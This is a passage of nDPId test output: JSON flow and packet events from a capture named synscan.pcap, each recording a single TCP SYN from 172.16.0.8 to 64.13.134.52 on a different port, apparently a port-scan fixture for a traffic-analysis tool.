-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAscwEAAC4Gp3GsEAAIQA2GNIzSBH3dUoMYAAAAAGACDAAoEgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs3eAAACwGPpKsEAAIQA2GNIzTBEHdU4MZAAAAAGACBAAwSwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs+toAACwGIZisEAAIQA2GNIzTeOfdU4MZAAAAAGACBAC7pAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAscqoAADUGoMisEAAIQA2GNIzTB9rdU4MZAAAAAGACCAAosgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsQX4AAC0G2fSsEAAIQA2GNIzTG7\/dU4MZAAAAAGACCAAUzQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsVJYAADcGvNysEAAIQA2GNIzTGgvdU4MZAAAAAGACEAAOgQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs+30AADAGHPWsEAAIQA2GNIzTTv3dU4MZAAAAAGACBADljgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRoAAC4GpVisEAAIQA2GNIzTDIvdU4MZAAAAAGACDAAgAQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsb7MAAC0Gq7+sEAAIQA2GNIzTAbzdU4MZAAAAAGACCAAu0AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_packet_id":1,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061071,"pkt":"ACYLMQczACWzv5HuCABFAAAs3jwAADYGNDasEAAIQA2GNIzTFO3dU4MZAAAAAGACDAAXnwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_packet_id":1,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061071,"pkt":"ACYLMQczACWzv5HuCABFAAAsrI8AADoGYeOsEAAIQA2GNIzTC17dU4MZAAAAAGACDAAhLgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs0rwAAC8GRrasEAAIQA2GNIzTEOHdU4MZAAAAAGACEAAXqwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsBRoAAC0GFlmsEAAIQA2GNIzTHOrdU4MZAAAAAGACCAATogAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsYVAAADMGtCKsEAAIQA2GNIzTFgHdU4MZAAAAAGACEAASiwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs7CgAAC4GLkqsEAAIQA2GNIzTC73dU4MZAAAAAGACDAAgzwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsAbcAACoGHLysEAAIQA2GNIzTF3bdU4MZAAAAAGACDAAVFgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs5SoAADkGKkisEAAIQA2GNIzTBDjdU4MZAAAAAGACCAAsVAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs+G4AAC4GIgSsEAAIQA2GNIzTB9bdU4MZAAAAAGACDAAktgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsRx0AACwG1VWsEAAIQA2GNIzTD57dU4MZAAAAAGACBAAk7gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsiHkAADAGj\/msEAAIQA2GNIzTJw7dU4MZAAAAAGACBAANfgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/NkAADgGE5msEAAIQA2GNIzTw1LdU4MZAAAAAGACBABxOQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs6hsAAC0GMVesEAAIQA2GNIzTC8PdU4MZAAAAAGACCAAkyQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsyFEAAC4GUiGsEAAIQA2GNIzTC7vdU4MZAAAAAGACDAAg0QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsTisAADAGykesEAAIQA2GNIzTGzndU4MZAAAAAGACBAAZUwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsfmAAADIGmBKsEAAIQA2GNIzTZIfdU4MZAAAAAGACDADIBAAAAgQFtA=="} 